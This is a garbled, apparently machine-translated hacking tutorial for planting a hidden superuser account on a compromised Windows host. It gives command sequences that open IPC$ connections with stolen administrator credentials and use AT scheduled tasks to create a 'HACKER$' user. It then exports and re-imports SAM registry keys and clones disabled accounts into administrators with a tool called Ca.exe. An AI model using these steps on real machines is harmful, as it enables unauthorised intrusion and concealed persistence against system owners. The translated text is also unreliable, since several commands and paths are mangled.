Here, use AT commands, because the planned task generated by AT is running as system, so it is not used to use the PSU.exe program. In order to be able to use the AT command, the broiler must open a SCHEDULE service. If not open, the tool NetSvc.exe or sc.exe in the stream of light can be used remotely. Of course, the method can also be used, as long as you can start the Schedule service. For command line, you can use a variety of connection methods, such as connecting the MSSQL's 1433 port with SQLEXEC, you can also use Telnet to get a cmdshell, and there is permission to run the AT command. 1. First find a broiler, as for how to come to this is not what I said here. Here first, it is assumed to find a super user for the administrator, the password is 12345678 broiler, now we start to remotely create a hidden super user on the command line. (The host in the example is a host in my local area network. I change its IP address to 13.50.97.238, do not sit on the Internet to avoid harassing the normal IP address.) 2, first establish a connection with broilers Command is: Net Use //13.50.97.238/ipc $ "12345678" / user: "Administrator 3, build a user on broiler with the AT command (if the AT service is not started, you can use the little Netsvc.exe or SC. EXE to stand remotely): AT //13.50.97.238 12:51 C: /Winnt/System32/Net.exe user HACKER $ 1234 / Add to build this add-on user name because there is a match, command This user will not display this user with NET USER, but can see this user. 4, export HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / USERS with an AT command: AT //13.50. 97.238 12:55 C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / / E is the parameters of regedit.exe, in HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / This button must be in / end. If necessary, use quotation marks "C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / USERS /". 5, Download the Hacker.reg on broilers to this machine with Notepad to open the editing command to: Copy //13.50.97.238/admin (//11.50.97.238/admin (//112/hacker.reg C: /Hacker.REG Modified method graphics After that, it will not be introduced here. 6, then edit the Hacker.reg to copy the broiler C: /Hacker.REG //13.50.97.238/admin $/system32/hacker1.reg 7, view broilers: Net Time //13.50.97.238 then use the AT command to delete the user HACKER $: AT //13.50.97.238 13:40 Net user Hacker $ / DEL 8, verify that the Hacker $ is deleted: Disconnect with the broiler with Net Use //13.50.97.238 / DEL. NET use //13.50.97.238/IPC $ "1234" / user: "HACKER $" is connected to the broiler with the broiler, and the description has been deleted.
9, then establish a connection with broiler: NET use //13.50.97.238/IPC $ "12345678" / user: "administrator" gets the broiler time, use the AT command to copy the broiler's Hacker1.REG import broiler registry: AT / /13.50.97.238 13:41 C: /Winnt/RegeDit.exe / s parameter / s parameter / s parameter / s refers to quiet mode. 10. Verify that the Hacker $ is established, the method is the same as above if the Hacker $ is deleted. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12, through 11 can determine the user HACKER $ with superuser privilege, because I started using the AT command to build it is a normal user, but now there is a remote reading, write, deleted permission. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premise here: 1, first use the NET USE // Baby Chicken IP / IPC $ "Password" / user: "Super User Name" to establish a connection with the remote host to use regedit.exe regedt32.exe and account management Connect with the remote host. 2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password). 4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator. First, I first clone the program Ca.exe first with Xiaoyan, and clone the disabled user Hacker into a super user (after cloning, the user's Hacker will be automatically activated): ca.exe // broiler IP Administrator Super User Password Hacher Hacher Password. 3. If you now have a cmdshell, if you use Telnet service or SQLEXEC to connect the shell of MSSQL's default port 1433, you can use the shell, then you only enter the command: Net user Hacker / Active: NO This user Hacker is disabled (at least surface This is the case), of course, you can also replace the user Hacher to other disabled users.
